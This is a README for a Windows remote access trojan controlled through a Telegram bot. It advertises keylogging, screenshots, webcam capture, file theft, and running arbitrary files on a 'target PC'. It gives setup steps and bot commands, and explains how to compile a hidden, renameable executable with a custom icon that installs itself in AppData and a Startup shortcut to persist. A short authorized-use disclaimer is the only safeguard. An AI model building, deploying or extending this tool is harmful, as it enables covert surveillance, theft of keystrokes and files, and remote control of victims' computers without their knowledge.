RAT-via-Telegram
Windows Remote Administration Tool via Telegram
Why another one?
-
The current Remote Administration Tools in the market face 2 major problems:
- Lack of encryption.
- Require port forwarding in order to control from hundreds of miles.
-
This RAT overcomes both these issues by using the Telegram bot API.
- Fully encrypted. The data being exchanged cannot be spied upon using MITM tools.
- Telegram messenger app provides a simple way to communicate to the target without configuring port forward before hand on the target.
Features:
- Run keylogger on the target PC.
- Get target PC's Windows version, processor and more.
- Get target PC's IP address information and approximate location on map.
- Show message box with custom text on target PC (Thanks mvrozanti!)
- List any directories on the target.
- Download any file locally from the target PC in the background.
- Upload local files on to the target PC. Send your image, pdf, exe or anything as
file
to the Telegram bot. - Screenshots of the target PC.
- Execute any file on the target PC.
- [WIP] Self-Destruct RAT on the target PC.
- [WIP] Take snapshots from the webcam (if attached).
- [WIP] Copy and Move files on the target PC.
- [WIP] Delete files on the target PC.
- More coming soon!
Screenshots:
Installation & Usage:
- Clone this repository.
- Set up a new Telegram bot talking to the
BotFather
. - Copy this token and replace it in the beginning of the script.
- Install the dependencies:
pip install -r requirements.txt
. - Install pyHook
64-bit
or32-bit
depending on your system.- For 64-bit-
pip install pyHook-1.5.1-cp27-cp27m-win_amd64.whl
. - For 32-bit-
pip install pyHook-1.5.1-cp27-cp27m-win32.whl
.
- For 64-bit-
- To run the script:
python RATAttack.py
. - Find your bot on telegram and send some command to the bot to test it.
- To restrict the bot so that it responds only to you, note down your
chat_id
from the console and replace it in the script and comment out the linereturn True
. Don't worry, you'll know when you read the comments in the script.
Commands:
When using the below commands; use /
as a prefix. For example: /pc_info
.
pc_info - PC information
msg_box - display message box with text
snapshot - take picture with webcam
ip_info - via ipinfo.io
download_file - download file from target
list_dir - list contents of directory
run_file - run a file on target
capture_pc - screenshot PC
keylogs - get keylogs
self_destruct - destroy all traces from target PC
You can copy the above to update your command list via BotFather
so you don't have to type them manually.
Compiling:
How To Compile:
- Go to
C:\Python27\Scripts\
or wherever you installed python. - Run
pyinstaller --onefile --noconsole C:\path\to\RATAttack.py
. You can also pass--icon=<path\to\icon.ico>
to use any custom icon. - Once it is compiled successfully, find the
.exe
file inC:\Python27\Scripts\dist\
. You can change the name of the.exe
to anything you wish. - BEWARE! If you run the compiled
.exe
, the script will hide itself and infect your PC to run at startup. You can return to normal by using the/self_destruct
option or manually removingC:\Users\Username\AppData\Roaming\Portal
directory andC:\Users\Username\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\portal.lnk
(although I recommend removing them manually for the time being).
Modifying Settings:
- You can also modify the name of hidden
.exe
file and location & name of the folder where the hidden.exe
will hide itself. To do this; modifycompiled_name
andhide_folder
respectively.
Notes:
- Currently only Python2 is supported. Python3 support will be added soon!
- Keylogger may detect some keys improperly. Like pressing
shift+/
results in recording/
instead of?
.
Contributing:
- This project is still in very early stages, so you can expect some bugs. Please feel free to report them! Even better, send a pull request :)
- Any new features and ideas are most welcome!
Disclaimer:
This tool is supposed to be used only on authorized systems. Any unauthorized use of this tool without explicit permission is illegal.
License:
The MIT License